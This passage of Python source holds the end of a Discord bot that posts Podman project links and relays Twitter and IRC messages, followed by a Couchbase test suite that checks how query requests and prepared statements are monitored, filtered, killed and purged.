if len(args) == 1:
if args[0] in ("tshoot", "trouble", "troubleshoot", "ts"):
embed = discord.Embed(
title="Troubleshooting Reference",
description="https://github.com/containers/podman/blob/main/troubleshooting.md",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] in ("git", "github"):
embed = discord.Embed(
title="GitHub",
description="https://github.com/containers/podman",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] in ("website", "webpage", "web"):
embed = discord.Embed(
title="Official Website",
description="https://podman.io/",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] == "issues":
embed = discord.Embed(
title="GitHub Issues",
description="https://github.com/containers/podman/issues",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] in ("prs", "PRS", "PRs", "PR", "pulls"):
embed = discord.Embed(
title="GitHub Pull Requests",
description="https://github.com/containers/podman/pulls",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
else:
return await ctx.reply("`Invalid Arguments`")
def establish_twitter_connection():
global twitter_id
listener = PodmanTweetStreamer()
auth = OAuthHandler(config.API_TOKEN, config.API_TOKEN_SECRET)
auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)
stream = Stream(auth, listener)
stream.filter(follow=[twitter_id])
def establish_irc_connection():
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ircsock.connect((config.SERVER, 6667))
ircsock.send(
bytes(
"USER "
+ config.NICK
+ " "
+ config.NICK
+ " "
+ config.NICK
+ " "
+ config.NICK
+ "\n",
encoding="utf8",
)
)
ircsock.send(bytes("NICK " + config.NICK + "\n", encoding="utf8"))
ircsock.send(bytes("JOIN " + config.CHANNEL + "\n", encoding="utf8"))
global sending
while True:
ircmsg = ircsock.recv(2048)
if b"/NAMES" in ircmsg:
sending = True
continue
if b"PING" in ircmsg:
ircsock.send(bytes("PONG :pong", encoding="utf8"))
continue
if b"JOIN" in ircmsg or b"QUIT" in ircmsg:
continue
if sending:
data = {"content": ircmsg.decode("utf-8")}
requests.post(config.IRC_WEBHOOK_URL, json=data)
print(ircmsg)
if __name__ == "__main__":
twitter_conn = threading.Thread(target=establish_twitter_connection)
twitter_conn.start()
irc_conn = threading.Thread(target=establish_irc_connection)
irc_conn.start()
bot.run(config.TOKEN, bot=True, reconnect=True)
twitter_conn.join()
irc_conn.join()
|
tuq_monitoring.py
|
import json
import logging
import threading
import time
from remote.remote_util import RemoteMachineShellConnection
from .tuq import QueryTests
class QueryMonitoringTests(QueryTests):
def setUp(self):
super(QueryMonitoringTests, self).setUp()
self.threadFailure = False
self.run_cbq_query('delete from system:completed_requests')
self.run_cbq_query('delete from system:prepareds')
self.rest.set_completed_requests_collection_duration(self.master, 1000)
self.rest.set_completed_requests_max_entries(self.master, 4000)
self.query_buckets = self.get_query_buckets(check_all_buckets=True)
def suite_setUp(self):
super(QueryMonitoringTests, self).suite_setUp()
def tearDown(self):
super(QueryMonitoringTests, self).tearDown()
def suite_tearDown(self):
super(QueryMonitoringTests, self).suite_tearDown()
##############################################################################################
#
# Monitoring Test Cases (Normal Queries)
#
##############################################################################################
'''Runs the basic cluster monitoring checks: (2 queries will be run when calling this method, each query will be
called from a different node)
-check if the running queries are in system:active_requests
-check if the queries' node fields accurately reflect the node they were started from
-check if a query can be accessed from system:active_requests using its requestId
-check if a query can be killed from system:active_requests using its requestId
-once the query is killed check if it is in system:completed_requests
-check if the queries appear in system:completed_requests when they complete.'''
def test_simple_cluster_monitoring(self):
self.test_monitoring(test='simple')
'''Runs basic completed_requests deletions
-check if you can delete the whole log
-check if you can delete by node
-check if you can delete by requestId'''
def test_purge_completed(self):
self.test_monitoring(test='purge')
'''Checks to see if active_requests and completed_requests can be filtered by node'''
def test_filter_by_node(self):
self.test_monitoring(test='filter')
'''Checks to see if the queries run from a server that has been downed are removed from system:completed_requests'''
def test_server_failure(self):
self.test_monitoring(test='simple')
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 3)
remote = RemoteMachineShellConnection(self.servers[1])
remote.stop_server()
time.sleep(30)
# Check to see that completed_requests does not contain info from the downed node
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
result = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
self.assertEqual(result['metrics']['resultCount'], 0)
# The info from the down node should not have been restored by the node coming back online
remote.start_server()
time.sleep(30)
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
result = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
self.assertEqual(result['metrics']['resultCount'], 0)
##############################################################################################
#
# Monitoring Helper Functions
#
##############################################################################################
def run_parallel_query(self, server):
logging.info('parallel query is active')
query = "(select * from " + self.query_buckets[0] + ") union (select d from " + self.query_buckets[
0] + " d JOIN " + self.query_buckets[0] + " def ON KEYS d.name) union (select * from " + self.query_buckets[
0] + ")"
self.run_cbq_query(query, server=server)
'''Run basic cluster monitoring checks (outlined in the helper function) by executing 2 queries in parallel, must be
run with a sufficient number of docs to be an effective test (docs-per-day >=3).'''
def test_monitoring(self, test):
for query_bucket in self.query_buckets:
logging.info('PURGING COMPLETED REQUEST LOG')
self.run_cbq_query('delete from system:completed_requests')
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 0)
logging.info("CHECKING THAT NO REQUESTS ARE RUNNING")
result = self.run_cbq_query('select * from system:active_requests')
self.assertEqual(result['metrics']['resultCount'], 1)
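            # resultCount is 1 rather than 0 because this SELECT itself appears in
            # system:active_requests while it runs.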
e = threading.Event()
if test == 'simple':
t50 = threading.Thread(name='run_simple_monitoring', target=self.run_simple_monitoring_check,
args=(e, 2))
elif test == 'purge':
t50 = threading.Thread(name='run_purge', target=self.run_purge_completed_requests,
args=(e, 2))
elif test == 'filter':
t50 = threading.Thread(name='run_filter_by_node', target=self.run_filter_by_node,
args=(e, 2))
t52 = threading.Thread(name='run_third_query', target=self.run_parallel_query,
args=[self.servers[1]])
t53 = threading.Thread(name='run_fourth_query', target=self.run_parallel_query,
args=[self.servers[1]])
else:
raise Exception("Incorrect test provided")
t51 = threading.Thread(name='run_second_query', target=self.run_parallel_query,
args=[self.servers[2]])
t50.start()
t51.start()
if test == 'filter':
t52.start()
t53.start()
e.set()
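            # Setting the event releases the monitoring thread to run its checks while
            # the union query below keeps a request active on another node.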
query = '(select * from %s ) union (select * from %s )' % (query_bucket, query_bucket)
self.run_cbq_query(query, server=self.servers[1])
logging.debug('event is set')
t50.join(100)
t51.join(100)
if test == 'filter':
t52.join(100)
t53.join(100)
self.assertFalse(self.threadFailure)
query_template = 'FROM %s select $str0, $str1 ORDER BY $str0,$str1 ASC' % query_bucket
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def run_simple_monitoring_check(self, e, t):
        while not e.is_set():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(5)
# check if the running queries are in system:active_requests
logging.info('CHECKING SYSTEM:ACTIVE_REQUESTS FOR THE RUNNING QUERIES')
result = self.run_cbq_query('select * from system:active_requests')
if not result['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error(
'NOT ALL ACTIVE QUERIES ARE IN ACTIVE_REQUESTS, THERE SHOULD BE 3 QUERIES ACTIVE. %s'
' QUERIES ARE ACTIVE.' % result['metrics']['resultCount'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the queries' node fields accurately reflect the node they were started from
logging.info("VERIFYING THAT ACTIVE_REQUESTS HAVE THE QUERIES MARKED WITH THE CORRECT NODES")
node1 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not node1['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY ON THE REQUESTED NODE: "%s:%s" IS NOT IN SYSTEM:ACTIVE_REQUESTS'
% (self.servers[1].ip, self.servers[1].port))
self.log.error(node1)
return
node2 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[2].port))
if not node2['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY ON THE REQUESTED NODE: "%s:%s" IS NOT IN SYSTEM:ACTIVE_REQUESTS'
% (self.servers[2].ip, self.servers[2].port))
self.log.error(node2)
return
# check if a query can be accessed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE ACCESSED VIA ITS requestId")
requestId = result['results'][1]['active_requests']['requestId']
result = self.run_cbq_query('select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" IS NOT IN ACTIVE_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if a query can be killed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE KILLED")
time.sleep(1)
self.run_cbq_query('delete from system:active_requests where requestId = "%s"' % requestId)
result = self.run_cbq_query('select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" WAS NOT KILLED AND IS STILL IN ACTIVE_REQUESTS'
% requestId)
return
# once the query is killed check if it is in system:completed_requests
result = self.run_cbq_query('select * from system:completed_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" WAS REMOVED FROM ACTIVE_REQUESTS BUT NOT PUT INTO '
'COMPLETED_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
time.sleep(60)
# check if the queries appear in system:completed_requests when they complete.
logging.info('CHECKING IF ALL COMPLETED QUERIES ARE IN SYSTEM:COMPLETED_REQUESTS')
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error('THE QUERIES EITHER DID NOT COMPLETE RUNNING OR WERE NOT ADDED TO '
'SYSTEM:COMPLETED_REQUESTS')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
def run_purge_completed_requests(self, e, t):
        while not e.is_set():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(60)
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS HAS QUERIES IN IT')
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error('THERE ARE NO ITEMS INSIDE SYSTEM:COMPLETED_REQUESTS')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the queries appear in system:completed_requests when they complete.
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS CAN BE PURGED')
self.run_cbq_query("delete from system:completed_requests")
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error('DELETE FAILED, THERE ARE STILL ITEMS INSIDE SYSTEM:COMPLETED_REQUESTS')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
query1 = threading.Thread(name='run_first_query', target=self.run_parallel_query,
args=[self.servers[1]])
query2 = threading.Thread(name='run_first_query', target=self.run_parallel_query,
args=[self.servers[1]])
query3 = threading.Thread(name='run_third_query', target=self.run_parallel_query,
args=[self.servers[2]])
query4 = threading.Thread(name='run_fourth_query', target=self.run_parallel_query,
args=[self.servers[2]])
query1.start()
query2.start()
query3.start()
query4.start()
query1.join(100)
query2.join(100)
query3.join(100)
query4.join(100)
# check if the queries can be purged selectively
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS CAN BE PURGED BY NODE')
self.run_cbq_query('delete from system:completed_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[2].port))
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error('DELETE FAILED, THERE ARE STILL ITEMS FROM NODE: "%s:%s"'
                          ' INSIDE SYSTEM:COMPLETED_REQUESTS'
% (self.servers[2].ip, self.servers[2].port))
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the queries can be purged by requestId
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS CAN BE PURGED BY REQUESTID')
requestId = result['results'][0]['completed_requests']['requestId']
self.run_cbq_query('delete from system:completed_requests where requestId = "%s"' % requestId)
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('DELETE FAILED, THE QUERY FOR REQUESTID: "%s" IS STILL '
'INSIDE SYSTEM:COMPLETED_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
def run_filter_by_node(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(3)
logging.info('CHECKING IF SYSTEM:ACTIVE_REQUESTS RESULTS CAN BE FILTERED BY NODE')
result = self.run_cbq_query('select * from system:active_requests')
node1 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[2].port))
if not node1['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INCORRECT')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node1)
return
node2 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not node2['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INCORRECT')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node2)
return
time.sleep(90)
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS RESULTS CAN BE FILTERED BY NODE')
result = self.run_cbq_query('select * from system:completed_requests')
node1 = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
                                            % (self.servers[2].ip, self.servers[2].port))
if not node1['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INACCURATE')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node1)
return
node2 = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not node2['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INACCURATE')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node2)
return
##############################################################################################
#
# Monitoring Prepared Test Cases
#
##############################################################################################
'''Runs the basic prepared monitoring checks:
-Check that the number of uses for a prepared statement is correctly updated
    -Check that prepared statements appear in system:active_requests when run
    -Check that prepared statements appear in system:completed_requests when run.'''
def test_prepared_monitoring(self):
self.test_prepared_common_body()
time.sleep(10)
# Check that both prepareds are in system:prepareds
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
name = result['results'][1]['prepareds']['name']
uses = result['results'][1]['prepareds']['uses']
self.assertEqual(uses, 1)
secondname = result['results'][1]['prepareds']['name']
e = threading.Event()
thread1 = threading.Thread(name='run_simple_monitoring', target=self.run_simple_monitoring_prepared_check,
args=(e, 2))
thread2 = threading.Thread(name='run_prepared', target=self.execute_prepared, args=(name, self.servers[0]))
thread3 = threading.Thread(name='run_prepared', target=self.execute_prepared,
args=(secondname, self.servers[1]))
thread1.start()
thread2.start()
thread3.start()
e.set()
thread1.join(100)
thread2.join(100)
thread3.join(100)
self.assertFalse(self.threadFailure)
'''Runs the basic prepared deletion checks:
-Check if system:prepareds can be purged completely
-Check if system:prepareds can be purged by node
-Check if system:prepareds can be purged by preparedName.'''
def test_prepared_deletion(self):
self.test_prepared_common_body()
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
# Check if you can delete everything in system:prepareds
self.run_cbq_query("delete from system:prepareds")
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 0)
# Reset prepared statements for next deletion check
self.test_prepared_common_body()
# Check if you can delete from system:prepareds by node
self.query = "delete from system:prepareds where node = '%s:%s'" \
% (self.servers[0].ip, self.servers[0].port)
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 4)
self.query = "delete from system:prepareds where node = '%s:%s'" \
% (self.servers[1].ip, self.servers[1].port)
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 2)
self.query = "delete from system:prepareds where node = '%s:%s'" \
% (self.servers[2].ip, self.servers[2].port)
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 0)
# Reset prepared statements for next deletion check
self.test_prepared_common_body()
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
prepared1 = result['results'][0]['prepareds']['name']
prepared2 = result['results'][1]['prepareds']['name']
# Check if system:prepareds can be deleted from by prepared name
self.query = "delete from system:prepareds where name = '%s'" % prepared1
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 3)
self.query = "delete from system:prepareds where name = '%s'" % prepared2
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 0)
'''Runs the basic prepared filtering checks:
-Check if system:prepareds can be filtered by prepared statement name
    -Check if system:prepareds can be filtered by node.'''
def test_prepared_filtering(self):
self.test_prepared_common_body()
# Check that both prepareds are in system:prepareds
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
prepared1 = result['results'][0]['prepareds']['name']
prepared2 = result['results'][1]['prepareds']['name']
# Check if you can access prepared statements from system:prepareds by the prepared statement's name
self.query = "select * from system:prepareds where name = '%s'" % prepared1
name1 = self.run_cbq_query(server=self.servers[2])
self.assertEqual(name1['metrics']['resultCount'], 3)
# Check if you can access prepared statements from system:prepareds by the prepared statement's name
self.query = "select * from system:prepareds where name = '%s'" % prepared2
name2 = self.run_cbq_query(server=self.servers[2])
self.assertEqual(name2['metrics']['resultCount'], 3)
# Check to see if system:prepareds can be filtered by node
self.query = "select * from system:prepareds where node = '%s:%s'" % \
(self.servers[0].ip, self.servers[0].port)
node1 = self.run_cbq_query()
self.assertEqual(node1['metrics']['resultCount'], 2)
# Check to see if system:prepareds can be filtered by node
self.query = "select * from system:prepareds where node = '%s:%s'" \
% (self.servers[1].ip, self.servers[1].port)
node2 = self.run_cbq_query()
self.assertEqual(node2['metrics']['resultCount'], 2)
# Check to see if system:prepareds can be filtered by node
self.query = "select * from system:prepareds where node = '%s:%s'" \
% (self.servers[2].ip, self.servers[2].port)
node3 = self.run_cbq_query()
self.assertEqual(node3['metrics']['resultCount'], 2)
def test_prepared_check_requestId(self):
self.test_prepared_kill(self.run_check_requestId)
def test_prepared_kill_by_requestId(self):
self.test_prepared_kill(self.run_kill_prepared_by_requestId)
def test_prepared_kill_by_name(self):
self.test_prepared_kill(self.run_kill_prepared_by_name)
def test_prepared_kill_by_node(self):
self.test_prepared_kill(self.run_kill_prepared_by_node)
##############################################################################################
#
# Prepared Test Helper Functions
#
##############################################################################################
def execute_prepared(self, prepared_name, server):
result = self.run_cbq_query('EXECUTE "%s"' % prepared_name, server=server)
'''Prepares two statements on different nodes.'''
def test_prepared_common_body(self, test_type=None):
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 0)
self.query = "(select * from " + self.query_buckets[0] + " union select * from " + self.query_buckets[
0] + " union select * from " + self.query_buckets[0] + ") " \
"union (select d from " + self.query_buckets[
0] + " d JOIN " + self.query_buckets[0] + " def ON KEYS d.name)"
self.prepared_common_body()
self.prepared_common_body(server=self.servers[1])
def run_simple_monitoring_prepared_check(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
logging.info('CHECKING # OF USES FOR THE PREPARED STATEMENT ON NODE "%s"' % self.servers[0])
result = self.run_cbq_query('select * from system:prepareds')
if not result['results'][0]['prepareds']['uses'] == 2:
self.threadFailure = True
logging.error(
'THE PREPARED STATEMENT SHOULD HAVE 2 USES, BUT ONLY "%s" USES HAVE BEEN REPORTED'
% result['results'][0]['prepareds']['uses'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the running queries are in system:active_requests
logging.info('CHECKING SYSTEM:ACTIVE_REQUESTS FOR THE RUNNING QUERIES')
result = self.run_cbq_query('select * from system:active_requests')
if not result['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error(
                        'NOT ALL ACTIVE QUERIES ARE IN ACTIVE_REQUESTS, THERE SHOULD BE 3 QUERIES ACTIVE. %s'
' QUERIES ARE ACTIVE.' % result['metrics']['resultCount'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
time.sleep(30)
# Check if the completed query is in system:completed_requests
logging.info('CHECKING SYSTEM:COMPLETED_REQUESTS FOR THE COMPLETED QUERIES')
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 6:
self.threadFailure = True
logging.error(
                        'COMPLETED REQUESTS IS DIFFERENT THAN WHAT IS EXPECTED, THERE SHOULD BE 6 QUERIES COMPLETED. %s'
' QUERIES ARE COMPLETED.' % result['metrics']['resultCount'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Checks if a prepared request can be killed from system:active_requests:
-Check if the request can be killed by its requestId
-Check if the request can be killed by its name.
-Check if requests can be killed by node.'''
def test_prepared_kill(self, test_to_run):
self.test_prepared_common_body("kill")
# Check that both prepareds are in system:prepareds
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
name = result['results'][0]['prepareds']['name']
secondname = result['results'][1]['prepareds']['name']
e = threading.Event()
thread1 = threading.Thread(name='run_prepared_test', target=test_to_run,
args=(e, 2))
thread2 = threading.Thread(name='run_prepared', target=self.execute_prepared, args=(name, self.servers[0]))
thread3 = threading.Thread(name='run_prepared', target=self.execute_prepared,
args=(secondname, self.servers[1]))
thread1.start()
thread2.start()
thread3.start()
e.set()
thread1.join(100)
thread2.join(100)
thread3.join(100)
self.assertFalse(self.threadFailure)
'''Helper to check if a prepared statement can be accessed by its requestId'''
def run_check_requestId(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(1)
result = self.run_cbq_query('select * from system:active_requests')
# check if a query can be accessed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE ACCESSED VIA ITS requestId")
requestId = result['results'][2]['active_requests']['requestId']
result = self.run_cbq_query('select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" IS NOT IN ACTIVE_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Helper to check if a prepared statement can be killed by its requestId'''
def run_kill_prepared_by_requestId(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
result = self.run_cbq_query('select * from system:active_requests')
requestId = result['results'][0]['active_requests']['requestId']
# check if a query can be killed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE KILLED BY REQUESTID")
self.run_cbq_query(
'delete from system:active_requests where requestId = "%s"' % requestId)
result = self.run_cbq_query(
'select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error(
'THE QUERY FOR requestId "%s" WAS NOT KILLED AND IS STILL IN ACTIVE_REQUESTS'
% requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Helper to check if a prepared statement can be killed by its preparedName'''
def run_kill_prepared_by_name(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
result = self.run_cbq_query('select * from system:active_requests')
# Check if a request can be killed by query name
logging.info("CHECKING IF A QUERY CAN BE KILLED BY NAME")
preparedName = result['results'][2]['active_requests']['preparedName']
self.run_cbq_query(
'delete from system:active_requests where preparedName = "%s"' % preparedName)
result = self.run_cbq_query(
'select * from system:active_requests where preparedName = "%s"'
% preparedName)
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error(
'THE QUERY FOR name "%s" WAS NOT KILLED AND IS STILL IN ACTIVE_REQUESTS'
% preparedName)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Helper to check if a prepared statement/multiple prepared statements can be killed by node'''
def run_kill_prepared_by_node(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
name = result['results'][0]['prepareds']['name']
secondname = result['results'][1]['prepareds']['name']
thread1 = threading.Thread(name='run_prepared',
target=self.execute_prepared,
args=(name, self.servers[0]))
thread2 = threading.Thread(name='run_prepared',
target=self.execute_prepared,
args=(name, self.servers[0]))
thread3 = threading.Thread(name='run_prepared',
target=self.execute_prepared,
args=(secondname, self.servers[1]))
thread1.start()
thread2.start()
thread3.start()
# Check if a request can be killed by query node
logging.info("CHECKING IF A QUERY CAN BE KILLED BY NODE")
time.sleep(0.3)
self.run_cbq_query(
'delete from system:active_requests where node = "%s:%s"'
% (self.servers[0].ip, self.servers[0].port))
result = self.run_cbq_query(
'select * from system:active_requests where node = "%s:%s"'
% (self.servers[0].ip, self.servers[0].port), server=self.servers[1])
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error('THE QUERIES FOR node "%s" WERE NOT KILLED AND ARE STILL IN ACTIVE_REQUESTS'
% self.servers[0].ip)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
result = self.run_cbq_query(
'select * from system:active_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error(
'THE QUERIES FOR node "%s" SHOULD NOT HAVE BEEN KILLED'
% self.servers[1].ip)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
##############################################################################################
#
# Configuration Test Settings (Completed_requests configuration settings)
#
##############################################################################################
'''Check that the configuration settings for system:completed_requests can be changed'''
def test_set_completed_config(self):
# Change the collection setting
response, content = self.rest.set_completed_requests_collection_duration(self.master, 10000)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], 10000)
response, content = self.rest.set_completed_requests_collection_duration(self.master, 1000)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], 1000)
# Change the retention setting
response, content = self.rest.set_completed_requests_max_entries(self.master, 10)
result = json.loads(content)
self.assertEqual(result['completed-limit'], 10)
response, content = self.rest.set_completed_requests_max_entries(self.master, 4000)
result = json.loads(content)
self.assertEqual(result['completed-limit'], 4000)
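    # (For reference: the rest helpers above are assumed to talk to the query service's
    # admin settings endpoint, i.e. something along the lines of
    #   curl -u Administrator:password -X POST http://<node>:8093/admin/settings \
    #        -d '{"completed-threshold": 1000, "completed-limit": 4000}'
    # The exact helper implementation lives outside this file, so the curl form above is
    # only an illustration of the settings being exercised here.)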
    '''Check that you can change the maximum number of entries that system:completed_requests keeps at one time.'''
def test_retention_config(self):
self.rest.set_completed_requests_max_entries(self.master, 4000)
num_entries = 10
# Change the retention setting to only hold the amount of queries specified by num_entries
response, content = self.rest.set_completed_requests_max_entries(self.master, num_entries)
result = json.loads(content)
self.assertEqual(result['completed-limit'], num_entries)
# Run more than num_entries(10) queries
for i in range(num_entries * 2):
self.run_cbq_query('select * from ' + self.query_buckets[0] + '')
time.sleep(1)
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 10)
# negative should disable the limit
num_entries = -1
response, content = self.rest.set_completed_requests_max_entries(self.master, num_entries)
result = json.loads(content)
self.assertEqual(result['completed-limit'], num_entries)
for i in range(100):
self.run_cbq_query('select * from ' + self.query_buckets[0])
time.sleep(1)
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 110)
# 0 should disable logging
num_entries = 0
response, content = self.rest.set_completed_requests_max_entries(self.master, num_entries)
result = json.loads(content)
self.assertEqual(result['completed-limit'], num_entries)
self.run_cbq_query('select * from ' + self.query_buckets[0])
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 110)
self.rest.set_completed_requests_max_entries(self.master, 4000)
'''Check that you can change the min duration a query has to run for to be stored in system:completed_requests'''
def test_collection_config(self):
self.rest.set_completed_requests_collection_duration(self.master, 1000)
# Test the default setting of 1 second
self.run_cbq_query('select * from system:active_requests')
self.run_cbq_query('select * from ' + self.query_buckets[0])
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 1)
# Wipe the completed logs for the next test
self.run_cbq_query('delete from system:completed_requests')
        # Change the minimum number of milliseconds a query needs to run for to be collected, in this case 5 seconds
min_duration = 5000
# Change the collection setting
response, content = self.rest.set_completed_requests_collection_duration(self.master, min_duration)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], min_duration)
# Construct nonsense queries that run for 5 seconds
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' union select * from ' + self.query_buckets[
